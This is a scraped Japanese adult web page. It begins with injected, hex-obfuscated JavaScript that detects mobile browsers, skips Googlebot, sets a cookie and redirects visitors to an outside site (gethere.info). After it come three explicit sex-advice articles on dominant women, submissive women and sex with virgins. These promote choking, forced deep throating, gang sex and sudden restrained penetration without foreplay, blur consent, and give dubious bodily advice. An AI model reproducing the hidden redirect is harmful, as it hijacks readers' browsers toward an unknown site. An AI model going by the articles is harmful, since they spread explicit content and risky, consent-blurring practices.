|\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

ドSの女性がひそかにしてほしいと思う8つのSEXプレイ

Sな女性と聞くとボンテージを身に纏い、ピンヒールを履き女王様と呼ばれるイメージを思い浮かべますが、見た目は普通でS心を持っている女性が一定数います。

ドSの女性がしてほしいと思うことを紹介したいと思います。

主従関係を明確にする



まずは最初に、あなたと彼女の主従関係を明確にし、ドSな彼女は女王様のような存在であなたは下僕、ペットですので、「あなたの下僕にしてください」と最初に言ってください。

そうすると彼女がS、あなたがMという関係がはっきりするので、ドSな彼女はその言葉でスイッチが入ります。

呻き声を聞きたい

ドSな彼女に対してあなたがMになりきりますが、もちろん男性特有の恥ずかしさや、プライドがあると思いますのでそこそこにですが、あなたがわざと変態になりきって声を出してください。

アメリカのAVみたいにリアクションを大袈裟に言ってみたり、虚ろな目をして呻き声を出したりすると不思議なことに、彼女のほうからいやらしい言葉を投げ掛けてくると思います。

ドSな女性は自分でいやらしい言葉を言って自分で興奮するタイプなので、無意識のうちに自分自身が興奮してマンコが大洪水になります。

舐めていいか許可を得る



女王様には基本的に敬語で話し、この世で一番偉い人のように接してください。

彼女のマンコをクンニしたり、何かしたりするときには勝手にすると「何勝手にしてんだよ?」と、彼女に怒られますので「お願いです、舐めさせてください」と言って、許可を得てからするようにしてください。

そして彼女からマンコへのクンニの許可をもらえたら、音を立てて大袈裟にしエサにがっつく犬のような気持ちで、あとは全力で奉仕してください。

女王様はその変態さやドMさに興奮するみたいです。

リップサービスをする

女王様にクンニしたり、全身をリップサービスしているときに、「もっとください、美味しいです」と言って女王様の体に感謝して美味しく味わってください。

そしてリップサービスは中途半端な奉仕では、せっかくのSMプレイが萎えてしまうので、あなたのプライドやキャラは全部捨てて、下品に変態にするようにしてください。

足の愛撫



ドSの女性に対して愛撫を徹底的にしますが、特に足を愛撫されることに非常に敏感で興奮しますので、太ももの内側や足の指を大袈裟に音を立てながら舐め回したり、よだれを垂らしながらびちゃびちゃ舐めたりすると、マンコの愛液が下に垂れるくらいになってきます。

そうなるとドSの彼女が、「気持ちいいの?」とか「どこが気持ちいいの?言ってごらん」とか、「あー、いやらしい、もうビンビンじゃない、なんてスケベなの?」などと言ってきますので、そうなったらさらにエスカレートしてマンコを舐め回してください。

そうすると「もう入れなさい、早く」とおねだりしてくるようになるので、そこでさらに焦らしてドSな彼女が「もう早くして」、と息遣いの荒くなったところですぐ挿入します。

自分から腰を振ってきますが、入れたらあなたもゆっくり腰を動かすのではなく、乱暴に激しく動かすようにしてください。

あなたへのドSな彼女からの攻め

ドSな彼女はあなたに対して、乳首や首筋、ぺニスなどを噛んで自分の物であるという印を付けたかったり、首を締めたりお尻にぺニスバンドを入れたりして、男性の苦しむ姿や悶える姿、困っている姿を見ることで、興奮するみたいです。

また縄やタオルで縛ったり、手錠をしたりムチで打ったり、目隠しをしながらしたりして、痛がっているのを見て興奮する人もいます。

しかしドSと一言で言っても、ソフトなSもいれば本当にドSな人もいて、したいことも一人一人違うと思いますので、深い関係になってからどんなことをしたいのかを聞くのもいいかもしれません。

そうすることによって、彼女とあなたの絆が強くなると思います。

彼女が言う前に挿入したくなったら



女王様があなたを攻めてくれていて、女王様のサービスが気持ちよすぎて我慢できないときは、「もう我慢が出来ませんので、入れさせてください」と伝えてください。

ドSな彼女は男性が我慢している姿に興奮して、女王様のスイッチが入ってもっといじめてあげたくなり、激しくなりますのであなたはぐっと堪えて我慢するようにしてください。

ドSな彼女のマンコに挿入したら

女王様を頑張って奉仕すれば挿入の許可をもらうことが出来ますが、いくらあなたがM男になりきり相手の女性が女王様であったとしても、ピストンは全力でするようにし、今までにないくらい思いっきり攻めるようにしますが、言葉はあくまでも女王様に接するように話すようにしてください。

そして女王様に対して腰を動かしながら、「こんなに気持ちがいいのは初めてです」と言い、ガンガン突いてあげるとそのうち女王様がイキそうになってきます。

ですがあなたは決して先にイカないようにしてください。

注意点

女王様と会話をするときは、基本的に敬語で話すようにしてください。

激しすぎるくらいが丁度良い
ので、ピストンの時はガンガン突いて全力で奉仕するようにしてください。

何度も同じ言葉を繰り返すことのないようにしてください。

色々なバリエーションを使って言葉攻めをしないと、しつこいと嫌われたり、冷めてしまったりしてしまいます。

相手の彼女の反応を見て本気で嫌がっている場合には、すぐに止めて修正し言葉では嫌と言っても、体が反応して喜んでいる場合もありますので、相手の反応をしっかりと見て判断をしてください。

また、相手の女性にはどんな言葉が一番有効かを見ながら試して、相手の女性の反応に合わせて攻められるようにしてください。

ドSと言っても一人一人度合いは違うと思いますし、痛がっている姿を見て興奮する人、苦しがっている姿を見て興奮する人や我慢している姿を見て興奮する人など、様々です。

ですから相手の女性とあなたが深い関係になったと思ったら、相手はどれくらいのドSなのか、どんなプレイをしてほしいのか、どんな感じの言葉を言って欲しいのかを細かく聞いてしてみてください。

そうすることによって、彼女とあなたの絆が深まり離れたくない居ないといけない関係になると思います。

まとめ

男性の痛がっている姿や我慢している姿などを見ることに、快楽や興奮を覚えますがドSな度合いは一人一人違いますので、上記で紹介した8つのSEXプレイを参考にして、ドSの彼女が満足できるSEXを楽しんで絆を深めてください。

ドMな女性がめっちゃして欲しいと思っているSEXのプレイ18選

女性の中には多少乱暴に扱われたい、痛いのが気持ちいい、苦しいのが好き、恥ずかしいのがとっても興奮するなどのドMな性癖を持つ人もいますが、そんな女性は普通のセックスでは満足できません。

ドMな女性と言っても実はそれぞれに好みのセックスや攻められ方がありますので、ドMな女性が好むセックスを紹介したいと思います。

乳首が千切れるくらいつねる



痛みが快感に変わるタイプのドMな女性には好まれ、乳首を強くつままれたり千切れるかと思うぐらいにつねられたり、乳首をつまんだままひっぱったりされると気持ちよくなります。

痛みはありますがその痛みがだんだんと快感に変わってきます。

バックでお尻を叩かれる

ドMな女性が好む体位の一つにバックがありますが、四つん這いになった状態やバックで挿入されながらお尻を叩かれると、ぺちぺちと音がすることとお尻を叩かれる痛みが病み付きになって気持ちよくなります。

また他の体の部位に比べるとお尻が叩かれて赤くなっても、他人には見られないので安心してプレイすることが出来ます。

首絞め



首を絞められてのセックスも好まれ、最初は好奇心でしてみたら首を絞められて苦しい中の快感が、どうにも忘れられないとすっかり性癖になってしまっている女性もいますが、この首絞めセックスは危険と隣り合わせのセックスになってしまうので、「首絞めて」と頼まれるとひいてしまう男性が多く、力の加減が非常に重要ですので気軽なプレイとしてはお勧め出来ません。

マンコに指を沢山入れる

通常男性が女性を攻めるときに指は1~2本程、多くても3本ですがドMな女性は更に4本入れて、みっちりとマンコに入れられて掻き回されることが快感に結び付きますし、また女性の中には指だけでなく拳を入れて、激しく突かれたり掻き回されたりするのが快感と言う人もいますが、共通しているのはマンコの中に大きく太いものを、限界ギリギリまで入れられるのを好むことです。

長時間フェラをする



よく聞くことがあると思いますが、長時間のフェラをさせられることがドMな女性にはたまらないプレイで、ご主人様にご奉仕している気持ちになれ、「舐めろ」と命令されてフェラをしている間男性は、タバコを吸ったり雑誌を読んだり、テレビを見たり寝転がったりしている間にドMな女性にフェラをさせます。

また強制的にフェラをさせられたり無理やり喉の奥まで突っ込まれたり、苦しいと思うことをさせられることがドMな女性にとって快感と満足感に繋がるみたいです。

目隠し

アイマスクやタオルなどで目隠しをされて視覚を遮断されてのセックスも好まれ、目隠しをされている分他の感覚が研ぎ澄まされたり不安感やドキドキ感がたまらなくなり、その状態でフェラをさせられると普段以上に舐める音に興奮したり、目隠しをされたまま愛撫されたり言葉攻めをされたりすると、普段以上に燃え上がりエロさが増す女性もいます。

手錠や縛り



手錠で手首を縛られると体の自由が奪われ主従関係が出来上がり、ドMな女性にはたまらないシチュエーションになり、体の自由を奪われて好きなように愛撫されたり、大人のおもちゃを使って攻められたりすることが終わりのない快感や被虐心を煽り、ドMな女性には欠かせないセックスのアイテム・攻め方となっています。

羞恥心を煽る

ドMな女性にとって恥ずかしいは快感になりますので、明るい場所でセックスしたり鏡を使ってセックスをしているところを見せたり、オナニーを強制したり言葉で羞恥心を煽るようにするセックスも好まれ、女性の中には誰かにセックスをして快感で乱れた姿を見られたい、という願望をもつドMな女性もいて野外セックスや様々な場所でのセックスじゃないと満足できない、という女性もいますが大抵のドMな女性は、ホテルなどの密室でのセックスの中に羞恥プレイを取り入れることを好みます。

刺激的な言葉攻め



ドMな女性はセックス中に男性から言葉でなじられることに大きな興奮と喜びを覚え、「勝手に気持ちよくなってんじゃねぇよ」「いやらしい女だな」などセックスの最中に攻められると、口では「ごめんなさい」と言いながらもどんどん気持ちよくなりますが、言葉攻めも女性によって好みがあり、「ブサイク」「緩いんだよ、もっと閉めろ」など最初から強い言葉を掛けられるのが好きな女性と、甘い言葉と冷たい言葉を織り混ぜて攻められるのが好きな女性がいますので、しっかり女性の反応を見極めるようにしてください。

アナル

アナルはドMでなくても好きな女性は多くいますが、ドMな女性は大好きで普通のセックスでは違うアナルに異物が入ることでの苦しい感じと、排泄物が気になる羞恥心が煽られることでドMっ気を刺激することが出来ますが、アナル未経験の女性であればアナル開発を少しずつ進めないと、筋が切れてしまったり出血したりしてしまいますので、優しく少しずつ拡げていき上手に飴とムチを使い分けてください。

バイブを使う



苦しい2本刺しプレイも大好きで前にも後ろにも何か入る感覚は、自分の下半身が征服されたような感覚に襲われ、苦しさと気持ちよさでドMな女性は訳が分からなくなりハマってしまうと、もう普通にセックスに戻れることはありません。

特にアナル開発中の時はバックで前にぺニスを挿入しながら、アナルにローターや小さめのバイブを入れながら開発することで、セックスの気持ちよさでアナルを拡げられる痛みや違和感が紛れるので、比較的早い段階でアナルセックスが可能になります。

放置プレイ

普通の女性ならセックスの最中に男性がいなくなったり、いつ帰ってくるのか分からない男性を恥ずかしい格好で待つのは屈辱的でしかありませんが、ドM女性がそのように男性に指示された時は「自分の忠誠心を試されてるんだ」と受け取り、それに全力で応えたいと感じるので、セックス中で自分が裸であっても公園など野外で裸にコート一枚という姿であっても、男性に「そのまま帰ってくるまで待ってろ」と言われれば、その言葉を信じて待とうとします。

ただ男女間に絶大な信頼感があることが前提ですので、関係が浅いうちは女性の忠誠心を試すプレイは控えてください。

誰に見られるか分からない



ドMな女性は羞恥心を煽られるセックスが大好きで、誰に見られるか分からない状況が彼女の興奮を更に高め、セックスに快感を感じます。

公園やビルの隙間、建物の階段や屋上などどんな場所でも男性からの指示があれば、そこで裸になることが出来ますが、ご主人様である男性への忠誠心から出来ることですので、関係が浅いうちはしないようにしてください。

輪姦プレイ

ドMな女性の中には輪姦願望がある女性が結構多くいて、より多くの男性に同時に攻められたいと思っていますが、もちろん見ず知らずの複数の男性とするのは危険なプレイですが、自分の信頼する男性の知り合いであれば安心して身を委ねることが出来、男性の指示のもとオーラルセックスをしながら膣にもぺニスを挿入され、更にアナルまでという状況はドMな女性にとっては至極の境地に感じるのかもしれません。

乳首や臍にピアスをつける



ドMな女性の中には乳首や臍、クリトリスにまでピアスをつけている人がいますが、これはご主人様である男性によってつけられたものであり「俺のもの」という印で、ドMな女性は束縛されることを喜びに感じるので多少痛みを伴っても、男性が自分の体に印をつけることを嬉しく感じ、その痛みが興奮を呼びます。

ビデオ撮影

普通の女性なら絶対に嫌がりますが、ドMな女性は興奮し快感を感じるセックスになりますが、セックスをしながら自分のセックスを見つつ「凄い顔してる」と言葉攻めをされるのは、堪らないプレイです。

いきなり挿入



ドMな女性の脳内には痛みが快感に変わる回路が備わっているので、前戯なしの挿入がおすすめでいきなり羽交い締めにして、後ろから挿入すると痛がりながらも感じます。

家畜プレイ

女性は虐げられることに快感を得たり、首輪や仮面、レザーの衣装などを身に付けるという変身自体を楽しみたいドMな女性も多く、身体的な結合をしなくても興奮するみたいです。

他にも嫉妬プレイで、彼氏が別の女性とセックスするのを見て興奮させたり、スカトロプレイで排泄物を出すところを見られたり、かけられたりする願望を持っているドMな女性も少人数ですがいます。

まとめ

ドMな女性が好むセックスと言っても好みは様々で、痛みや苦しみ、羞恥の中でもパートナーの愛を感じることが大切ですので、上記で紹介したことを是非参考にして、ドMな女性を満足させ楽しい時間を過ごしてください。

処女とSEXする時に気を付けなければならない10個のこと

処女喪失は女性にとって一生に一度のことで、とても大切な儀式ですので処女を捧げられることの重要さ、責任の重さを再認識するようにしてください。

処女とセックスするときに絶対に気を付けて欲しいことを10個紹介します。

処女喪失は女性のためのものであること




処女喪失は女性のためのものと強く意識
し、最近では初体験までにあらゆる情報が手に入るため、セックスの手順通りにしなければと思うかもしれませんが、一番大切なことは目の前にいる愛している女性をしっかりと見つめることです。

一回目でセックスを成功させる必要はなく、ゆっくりと少しずつ二人で進め、相手の女性を思いやることを一番にし、射精することが出来なくても我慢するようにしてください。

多くの女性は処女を捧げた男性に特別な思いを抱くので、まだまだこれから肉体が開発されていく過程を一緒に共有することが出来ます。

出来る限り清潔にする

処女の女性とセックスするときに特に気を付けたいことが、全身を清潔にしておくことですが爪は短く切り、切ったあとはやすりをかけることによって、女性のデリケートな性器を傷つけずにすみます。

手は性行為を始める前に綺麗に石鹸で洗い、そのあとは整髪料のついたままのヘアスタイルを手ぐしで直すのも控えます。

女性の中には膣の中が非常に菌に対して抵抗力の弱い人がいたり、クリトリスの刺激の時に尿道から菌が入ってしまい、膀胱炎になってしまうこともありますので、本当は性行為の前に二人でシャワーに入って、全身を綺麗に洗うことが良いのですが、親と同居の彼氏や彼女の部屋であれば、なかなか出来ないことが多いと思いますが、その場合でも最低限手は綺麗に洗うようにしてください。

上記と同じ理由で口腔内の衛生に気を付け、出来れば寸前に歯を磨ければ良いですが、無理な場合は糖分の入っていないお茶や水などを飲み、口腔内に食べ物のカスや煙草のタールを残さないように注意しますが、初めての性行為の場合は、性器を舐められることを拒む女性もいますので、無理強いはしないようにしてください。

ホテルの部屋などを利用できれば安心ですが、自分の部屋などの場合も出来るだけ清潔にするようにし、シーツなどの汚れが気になる場合は、清潔なバスタオルを用意することによって、出血があった時にも役立ちます。

野外などは絶対に避けるようにしてください。

コンドームを正しくつけること



たった初めてのセックスをしただけでも、妊娠してしまうことがありますので、出来るだけ確実に避妊できるようにコンドームを必ず正しくつけるようにしてください。

男性も女性経験が少ない場合は、オナニーの時にしっかり勃起してからコンドームをつける練習をし、コンドームは潤滑剤のジェル付きのものが多いので、初めての挿入時の女性の痛みを軽減させることが出来ます。

女性の体について知っておくこと

特に処女喪失の時の痛みについて知っておくことが必要で、最初のセックスの時は一部例外を除いて、誰でも痛みを感じますが、その痛みの度合いは処女膜の開口部の大きさや処女膜の厚さ、柔軟性、男性の技術によっても異なります。

膣内を潤すために十分愛撫をし、ゆっくりと時間をかけて挿入を焦らずにし、その状態で正しい場所にぺニスを挿入すれば出血を抑えられますし、痛みもさほど感じません。

処女喪失の痛みを和らげるという観点からは、初体験同士のセックスは難しいことも事実ですが、2回目以降は女性の大半が痛みを感じませんし、処女喪失の時に出血するのは約半数で、処女膜は破れるというより裂けるといった表現の方が良いですが、性交事態が初体験でも激しい動作やオナニーで処女膜が損傷していることがあります。

その場合は痛みがないこともありますし、出血がないこともありますので、処女であることを疑うような発言はしないようにしてください。

挿入までの手順1



処女喪失は女性にとって大きなイベントなので、緊張することも少なくありません。

そうなると体がこわばってしまって濡れにくくなっていることも多いので、膣内や小陰唇がしっかりと濡れるまで愛撫を繰り返し、焦らずに待ってください。

それでも膣内がなかなか濡れない場合は、ローションを使うことが出来ますがもちろん膣が濡れている状態で使うことも出来、痛みを和らげることが出来ます。

処女とセックスすることが決まっているなら、必ず常備し痛みや違和感、恐怖心を女性に与えないようにしてください。

挿入までの手順2

膣内を十分濡らしたら指を挿入しますが、指の入れ方が下手だと女性が痛がったり嫌がったりしますので、しっかりと注意して指を入れて愛撫してください。

初めから中指や人差し指で愛撫すると、太すぎたりして痛みを感じてしまうことがありますので、最初は薬指や小指から入れていくようにし、指の腹を女性のお腹側に向けて入れてください。

また指を挿入するときには、しっかりと前日までに短く爪を切って、やすりがけをし膣を傷つけることのないように爪の手入れはしっかりと行ってください。

挿入までの手順3



指を挿入してある程度膣を慣らすことが出来たら、いよいよぺニスを挿入しますが、挿入の時には処女喪失に適した体位で挿入することが大切ですので、初めてセックスするときは正常位がお勧めです。

それ以外の体位で行うと膣が確認しにくかったり、正しく挿入したりするのが難しくなってしまいますが、そうなると痛みが増すだけですので、出来ればM字開脚をして大きく足を開いてもらうことが大切です。

始めは恥ずかしい気持ちが勝ってしまって、そんな格好を自らする人はあまりいないと思うので、しっかりと理由を説明してM字開脚をしてもらえるようにしてください。

また挿入するときには膣の位置にしっかりと正確にぺニスをあてて慎重に挿入し、勢いよく入れるのではなく痛みを持続させないために、素早く挿入するように心がけてください。

確実に処女膜を破ることが出来るようにぺニスを根元まで入れますが、根元まで入れたときが一番強い痛みを感じますので、素早く入れてしまうようにし入れ方が不十分だと、処女膜が裂けずにいつまでたっても痛みが持続してしまうことになりますので、彼女にかわいそうだと思うかもしれませんが、しっかりと根元まで挿入して痛みから早く解放してあげてください。

挿入したあと

根元までしっかりと挿入したら、彼女の緊張がしっかりとほぐれるまでしばらくはじっとしておき、処女喪失を一緒に喜び痛みを耐えることが出来たことを褒めてあげてください。

緊張がほぐれてくると足から力が抜けて来ることが多いので、足の位置に注意ししっかりと力が抜けてからぺニスを動かすようにしてください。

力が抜ける前にぺニスを動かしてしまうと、痛みを増幅させてしまう可能性があるので、緊張が溶けて彼女と会話が出来るようになるまでは動かずにじっとしておくようにしてください。

緊張をほぐしたあと



緊張がしっかりとほぐれて少し休んだら、ぺニスと膣をくっつけたままで少し振動させ様子を見ながら行い、ぺニスが抜けて再挿入したり抜けそうになってもう一度挿入したりすると、痛みが増すので膣から抜けないようにあまり前後に動かさないようにしてください。

腰を使ってしまうと動きが大きくなってしまうので使わないようにし、彼女が痛がってしまったときには無理に射精するまで膣内に挿入しておくのではなく、終わりにし結構痛みが強く出る女性もいますので、一回入れて動かさずに終わることもあり不満かもしれませんが、処女をくれた女性はあとは何回もセックスを楽しむことが可能ですから、焦らずにゆっくりと気持ちよさを得るようにしてください。

セックスが終わったあと

処女喪失のセックスのあとはずっと彼女の側にいて優しく包み込むようにしてあげてください。

男性は見逃しがちなのですが、女性はセックスのあとかなり疲れたりぺニスを抜いたあとも膣が痛みを感じたり、初めて感じるセックスの後の違和感に倦怠感を感じていることもありますので、「よく頑張ったね」「可愛かったよ」等と優しく声をかけしっかりと喜びを共有し、ベッドの上でしっかりと休んだあとは疲れをとったり、ローションなどを洗い落とすために入浴し、その時も色々と優しく手助けしてあげるようにしてください。

まとめ

女性にとっては処女喪失は一生に一度ですので、一つになりたいと心から願うタイミングにし、女性が望んでいない初体験は避けるようにしてください。

上記で紹介した10個のことに気を付けて、処女と是非セックスを楽しんでください。